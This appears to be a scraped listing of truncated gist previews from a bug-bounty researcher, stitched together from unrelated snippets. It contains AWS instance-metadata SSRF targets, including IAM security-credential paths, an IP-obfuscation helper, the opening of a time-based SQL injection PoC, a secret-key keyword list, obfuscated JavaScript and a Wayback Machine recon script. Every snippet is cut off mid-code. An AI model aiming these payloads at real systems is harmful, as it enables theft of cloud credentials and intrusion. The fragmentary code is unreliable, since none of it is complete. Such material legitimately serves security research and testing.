Any information required by PROGRAM, like 'keywords' used by Concrete5, Phabricator etc.
summary of the vulnerability - where, what, why :)
## AWS | |
# from http://docs.aws.amazon.com/AWSEC2/latest/UserGuide/ec2-instance-metadata.html#instancedata-data-categories | |
http://169.254.169.254/latest/user-data | |
http://169.254.169.254/latest/user-data/iam/security-credentials/[ROLE NAME] | |
http://169.254.169.254/latest/meta-data/iam/security-credentials/[ROLE NAME] | |
http://169.254.169.254/latest/meta-data/ami-id | |
http://169.254.169.254/latest/meta-data/reservation-id | |
http://169.254.169.254/latest/meta-data/hostname | |
http://169.254.169.254/latest/meta-data/public-keys/0/openssh-key |
import sys | |
def to_octets(ip): | |
return [int(i) for i in ip.split('.')] | |
def dotless_decimal(ip): | |
octets = to_octets(ip) | |
result = octets[0] * 16777216 + octets[1] * \ |
#!/usr/bin/env python | |
# XXXX.asp time-based SQL injection PoC exploit | |
# Rafal 'bl4de' Janicki | |
import requests | |
# base url |
api | |
api_key | |
api_secret_key | |
secret_key | |
secret | |
BEGIN | |
PRIVATE | |
private | |
PRIVATE_KEY | |
private_key |
( | |
[ | |
, | |
ウ, // "o" | |
, | |
, | |
, | |
ア // "c" | |
] = |
import requests | |
import sys | |
import json | |
def waybackurls(host, with_subs): | |
if with_subs: | |
url = 'http://web.archive.org/cdx/search/cdx?url=*.%s/*&output=json&fl=original&collapse=urlkey' % host | |
else: | |
url = 'http://web.archive.org/cdx/search/cdx?url=%s/*&output=json&fl=original&collapse=urlkey' % host |
NOTE: The following list has been created based on the PPT "The Bug Hunters Methodology V2 by @jhaddix"